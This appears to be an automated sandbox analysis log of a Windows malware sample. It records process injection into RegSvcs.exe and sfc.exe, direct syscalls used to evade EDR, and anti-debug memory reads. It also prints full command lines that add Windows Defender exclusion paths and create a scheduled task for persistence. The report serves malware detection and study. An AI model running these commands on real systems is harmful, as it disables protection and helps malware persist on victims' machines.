            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01642835 mov eax, dword ptr fs:[00000030h]9_2_01642835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A830 mov eax, dword ptr fs:[00000030h]9_2_0165A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C483A mov eax, dword ptr fs:[00000030h]9_2_016C483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C483A mov eax, dword ptr fs:[00000030h]9_2_016C483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC810 mov eax, dword ptr fs:[00000030h]9_2_016AC810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EA8E4 mov eax, dword ptr fs:[00000030h]9_2_016EA8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C8F9 mov eax, dword ptr fs:[00000030h]9_2_0165C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C8F9 mov eax, dword ptr fs:[00000030h]9_2_0165C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164E8C0 mov eax, dword ptr fs:[00000030h]9_2_0164E8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F08C0 mov eax, dword ptr fs:[00000030h]9_2_016F08C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620887 mov eax, dword ptr fs:[00000030h]9_2_01620887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC89D mov eax, dword ptr fs:[00000030h]9_2_016AC89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161CB7E mov eax, dword ptr fs:[00000030h]9_2_0161CB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D4B4B mov eax, dword ptr fs:[00000030h]9_2_016D4B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D4B4B mov eax, dword ptr fs:[00000030h]9_2_016D4B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B6B40 mov eax, dword ptr fs:[00000030h]9_2_016B6B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B6B40 mov eax, dword ptr fs:[00000030h]9_2_016B6B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EAB40 mov eax, dword ptr fs:[00000030h]9_2_016EAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C8B42 mov eax, dword ptr fs:[00000030h]9_2_016C8B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618B50 mov eax, dword ptr fs:[00000030h]9_2_01618B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F2B57 mov eax, dword ptr fs:[00000030h]9_2_016F2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F2B57 mov eax, dword ptr fs:[00000030h]9_2_016F2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F2B57 mov eax, dword ptr fs:[00000030h]9_2_016F2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F2B57 mov eax, dword ptr fs:[00000030h]9_2_016F2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CEB50 mov eax, dword ptr fs:[00000030h]9_2_016CEB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164EB20 mov eax, dword ptr fs:[00000030h]9_2_0164EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164EB20 mov eax, dword ptr fs:[00000030h]9_2_0164EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E8B28 mov eax, dword ptr fs:[00000030h]9_2_016E8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E8B28 mov eax, dword ptr fs:[00000030h]9_2_016E8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4B00 mov eax, dword ptr fs:[00000030h]9_2_016F4B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169EB1D mov eax, dword ptr fs:[00000030h]9_2_0169EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628BF0 mov eax, dword ptr fs:[00000030h]9_2_01628BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628BF0 mov eax, dword ptr fs:[00000030h]9_2_01628BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628BF0 mov eax, dword ptr fs:[00000030h]9_2_01628BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164EBFC mov eax, dword ptr fs:[00000030h]9_2_0164EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016ACBF0 mov eax, dword ptr fs:[00000030h]9_2_016ACBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01640BCB mov eax, dword ptr fs:[00000030h]9_2_01640BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01640BCB mov eax, dword ptr fs:[00000030h]9_2_01640BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01640BCB mov eax, dword ptr fs:[00000030h]9_2_01640BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620BCD mov eax, dword ptr fs:[00000030h]9_2_01620BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620BCD mov eax, dword ptr fs:[00000030h]9_2_01620BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620BCD mov eax, dword ptr fs:[00000030h]9_2_01620BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CEBD0 mov eax, dword ptr fs:[00000030h]9_2_016CEBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630BBE mov eax, dword ptr fs:[00000030h]9_2_01630BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630BBE mov eax, dword ptr fs:[00000030h]9_2_01630BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D4BB0 mov eax, dword ptr fs:[00000030h]9_2_016D4BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D4BB0 mov eax, dword ptr fs:[00000030h]9_2_016D4BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165CA6F mov eax, dword ptr fs:[00000030h]9_2_0165CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165CA6F mov eax, dword ptr fs:[00000030h]9_2_0165CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165CA6F mov eax, dword ptr fs:[00000030h]9_2_0165CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CEA60 mov eax, dword ptr fs:[00000030h]9_2_016CEA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169CA72 mov eax, dword ptr fs:[00000030h]9_2_0169CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169CA72 mov eax, dword ptr fs:[00000030h]9_2_0169CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626A50 mov eax, dword ptr fs:[00000030h]9_2_01626A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626A50 mov eax, dword ptr fs:[00000030h]9_2_01626A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626A50 mov eax, dword ptr fs:[00000030h]9_2_01626A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626A50 mov eax, dword ptr fs:[00000030h]9_2_01626A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626A50 mov eax, dword ptr fs:[00000030h]9_2_01626A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626A50 mov eax, dword ptr fs:[00000030h]9_2_01626A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01626A50 mov eax, dword ptr fs:[00000030h]9_2_01626A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630A5B mov eax, dword ptr fs:[00000030h]9_2_01630A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630A5B mov eax, dword ptr fs:[00000030h]9_2_01630A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165CA24 mov eax, dword ptr fs:[00000030h]9_2_0165CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164EA2E mov eax, dword ptr fs:[00000030h]9_2_0164EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01644A35 mov eax, dword ptr fs:[00000030h]9_2_01644A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01644A35 mov eax, dword ptr fs:[00000030h]9_2_01644A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165CA38 mov eax, dword ptr fs:[00000030h]9_2_0165CA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016ACA11 mov eax, dword ptr fs:[00000030h]9_2_016ACA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165AAEE mov eax, dword ptr fs:[00000030h]9_2_0165AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165AAEE mov eax, dword ptr fs:[00000030h]9_2_0165AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01676ACC mov eax, dword ptr fs:[00000030h]9_2_01676ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01676ACC mov eax, dword ptr fs:[00000030h]9_2_01676ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01676ACC mov eax, dword ptr fs:[00000030h]9_2_01676ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620AD0 mov eax, dword ptr fs:[00000030h]9_2_01620AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01654AD0 mov eax, dword ptr fs:[00000030h]9_2_01654AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01654AD0 mov eax, dword ptr fs:[00000030h]9_2_01654AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628AA0 mov eax, dword ptr fs:[00000030h]9_2_01628AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628AA0 mov eax, dword ptr fs:[00000030h]9_2_01628AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01676AA4 mov eax, dword ptr fs:[00000030h]9_2_01676AA4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtTerminateThread: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeNtMapViewOfSection: Direct from: 0x77542D1C
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\sfc.exeThread register set: target process: 7228
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\sfc.exeThread APC queued: target process: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DC3008Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 904008Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
